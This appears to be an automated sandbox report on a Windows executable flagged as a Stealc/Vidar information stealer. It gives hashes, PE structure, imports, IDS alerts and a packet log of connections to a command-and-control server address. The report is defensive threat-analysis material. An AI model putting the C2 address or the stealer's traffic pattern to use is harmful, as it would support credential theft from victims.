                                                                                                                                                                                                                                                Entropy (8bit):6.388427618173688
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:dZKPE9gotO.exe
                                                                                                                                                                                                                                                File size:321'024 bytes
                                                                                                                                                                                                                                                MD5:876a365bda09b9ef39605e375d677f0a
                                                                                                                                                                                                                                                SHA1:2c12b38ed2d84722cf5dcea8bd45cfa7d7b55ba4
                                                                                                                                                                                                                                                SHA256:ed252fe89ba1243bad21f373c952b16940a0094149b0be50e5c3da9c20a23234
                                                                                                                                                                                                                                                SHA512:2a2df513d61e9b0eeedf099bb6a04962caa5eb31149efc24421bc30236886fc4a60fb7bcabed46069f0a13789ca34d4f21bc02f3c53bd8cf428be399ae63cb7d
                                                                                                                                                                                                                                                SSDEEP:3072:u2ShpWIPJq+l0qwJyLZhOaHgEbR23iLEhO5efjlbDdl75Zsa1bkZ:uxVl0qwIhOAgEbXUjLF
                                                                                                                                                                                                                                                TLSH:2D64AF1322F06C26E6F34B319D3DB7E82A2FF9624E78A65A711C6B2F05711A1C573712
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L......e...........

                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                Icon Hash:e83225292b270d31

                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Entrypoint:0x40185c
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x650B9EDC [Thu Sep 21 01:39:40 2023 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:28289f2f7e0a533d999708a3ae088e0b

                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007F2210B2BC46h
                                                                                                                                                                                                                                                jmp 00007F2210B282CDh
                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                                                                                mov dword ptr [0043CC18h], eax
                                                                                                                                                                                                                                                mov dword ptr [0043CC14h], ecx
                                                                                                                                                                                                                                                mov dword ptr [0043CC10h], edx
                                                                                                                                                                                                                                                mov dword ptr [0043CC0Ch], ebx
                                                                                                                                                                                                                                                mov dword ptr [0043CC08h], esi
                                                                                                                                                                                                                                                mov dword ptr [0043CC04h], edi
                                                                                                                                                                                                                                                mov word ptr [0043CC30h], ss
                                                                                                                                                                                                                                                mov word ptr [0043CC24h], cs
                                                                                                                                                                                                                                                mov word ptr [0043CC00h], ds
                                                                                                                                                                                                                                                mov word ptr [0043CBFCh], es
                                                                                                                                                                                                                                                mov word ptr [0043CBF8h], fs
                                                                                                                                                                                                                                                mov word ptr [0043CBF4h], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [0043CC28h]
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC1Ch], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC20h], eax
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                mov dword ptr [0043CC2Ch], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                mov dword ptr [0043CB68h], 00010001h
                                                                                                                                                                                                                                                mov eax, dword ptr [0043CC20h]
                                                                                                                                                                                                                                                mov dword ptr [0043CB1Ch], eax
                                                                                                                                                                                                                                                mov dword ptr [0043CB10h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [0043CB14h], 00000001h
                                                                                                                                                                                                                                                mov eax, dword ptr [0043A004h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [0043A008h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                call dword ptr [000000C0h]

                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3896c0x50.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4170000xf430.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x384d00x40.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x370000x188.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x356bc0x3580052162e877488812884f3cf96e1385846False0.7683128285630841data7.203655785812803IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rdata0x370000x224c0x2400b21a12c061b515b8e2f419547e683b89False0.3486328125data5.345517404515869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x3a0000x3dc49c0x7000fd627e7e10e1dbcf8c41598a6db27b75unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x4170000xf4300xf6000b2ec2c1f7ab33c14b6402d20ed2e3c4False0.3673145325203252data4.4176732090446365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_CURSOR0x4220c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                RT_ICON0x4176100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.3296908315565032
                                                                                                                                                                                                                                                RT_ICON0x4184b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.3935018050541516
                                                                                                                                                                                                                                                RT_ICON0x418d600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.3945852534562212
                                                                                                                                                                                                                                                RT_ICON0x4194280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.4031791907514451
                                                                                                                                                                                                                                                RT_ICON0x4199900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkmenTurkmenistan0.22074688796680497
                                                                                                                                                                                                                                                RT_ICON0x41bf380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkmenTurkmenistan0.24835834896810507
                                                                                                                                                                                                                                                RT_ICON0x41cfe00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkmenTurkmenistan0.2778688524590164
                                                                                                                                                                                                                                                RT_ICON0x41d9680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkmenTurkmenistan0.30319148936170215
                                                                                                                                                                                                                                                RT_ICON0x41de480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.3805970149253731
                                                                                                                                                                                                                                                RT_ICON0x41ecf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.5342960288808665
                                                                                                                                                                                                                                                RT_ICON0x41f5980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.6036866359447005
                                                                                                                                                                                                                                                RT_ICON0x41fc600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.6235549132947977
                                                                                                                                                                                                                                                RT_ICON0x4201c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.3825046904315197
                                                                                                                                                                                                                                                RT_ICON0x4212700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.375
                                                                                                                                                                                                                                                RT_ICON0x421bf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.42730496453900707
                                                                                                                                                                                                                                                RT_STRING0x4231400x47adata0.4424083769633508
                                                                                                                                                                                                                                                RT_STRING0x4235c00xc8data0.57
                                                                                                                                                                                                                                                RT_STRING0x4236880x6a8data0.43133802816901406
                                                                                                                                                                                                                                                RT_STRING0x423d300x600data0.4303385416666667
                                                                                                                                                                                                                                                RT_STRING0x4243300x802data0.41804878048780486
                                                                                                                                                                                                                                                RT_STRING0x424b380x75edata0.4268292682926829
                                                                                                                                                                                                                                                RT_STRING0x4252980x56cdata0.4546109510086455
                                                                                                                                                                                                                                                RT_STRING0x4258080x6cedata0.4293915040183697
                                                                                                                                                                                                                                                RT_STRING0x425ed80x556data0.44363103953147875
                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x422f700x14data1.25
                                                                                                                                                                                                                                                RT_GROUP_ICON0x4220600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                RT_GROUP_ICON0x41ddd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                RT_VERSION0x422f880x1b4data0.5688073394495413

                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                KERNEL32.dllSetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                TurkmenTurkmenistan

                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-12-16T15:39:38.746601+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.749704116.203.12.114443TCP
                                                                                                                                                                                                                                                2024-12-16T15:39:41.047529+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.114443192.168.2.749711TCP
                                                                                                                                                                                                                                                2024-12-16T15:39:43.453157+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.114443192.168.2.749720TCP

                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:22.979893923 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:25.808891058 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:26.190253973 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:26.948854923 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.448628902 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.971916914 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.971965075 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.972337008 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.986743927 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.986767054 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.375648975 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.375736952 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.692059994 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.692095995 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.693051100 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.693111897 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.703610897 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:30.747325897 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.142910957 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.142935991 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.142980099 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.142997026 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.142999887 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.143014908 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.143183947 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.146121979 CET49700443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.146141052 CET44349700149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.433003902 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.468799114 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.468827009 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.468900919 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.469249010 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.469259977 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:32.589252949 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.294290066 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.294361115 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.344297886 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.344312906 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.344537973 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.344584942 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.345076084 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:33.391328096 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.087977886 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.088063002 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.088085890 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.088145018 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.104125977 CET49701443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.104154110 CET44349701116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.118963957 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.119002104 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.119155884 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.119420052 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:34.119429111 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.530776978 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.530904055 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.531455994 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.531466007 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.533245087 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.533251047 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.638936996 CET44349699104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:35.639106035 CET49699443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428505898 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428590059 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428637981 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428664923 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428870916 CET49703443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.428891897 CET44349703116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.430222034 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.430260897 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.430326939 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.430562973 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:36.430574894 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.386166096 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.829778910 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.829864025 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.830813885 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.830832005 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.833234072 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:37.833255053 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746620893 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746656895 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746738911 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746767998 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.746820927 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.747176886 CET49704443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.747205019 CET44349704116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753397942 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753423929 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753509998 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753802061 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:38.753813982 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158210993 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158344030 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158811092 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.158818007 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.160706043 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:40.160713911 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047322989 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047353983 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047436953 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047482014 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047482014 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.047509909 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.048000097 CET49711443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.048015118 CET44349711116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057014942 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057045937 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057116985 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057367086 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:41.057378054 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475197077 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475274086 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475781918 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.475799084 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.477514982 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:42.477535963 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.452955961 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453049898 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453078032 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453114986 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453406096 CET49720443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.453421116 CET44349720116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554090023 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554136992 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554198027 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554420948 CET49728443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:43.554433107 CET44349728116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545432091 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545455933 CET44349731116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545536995 CET49731443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:44.545717955 CET49731443192.168.2.7116.203.12.114
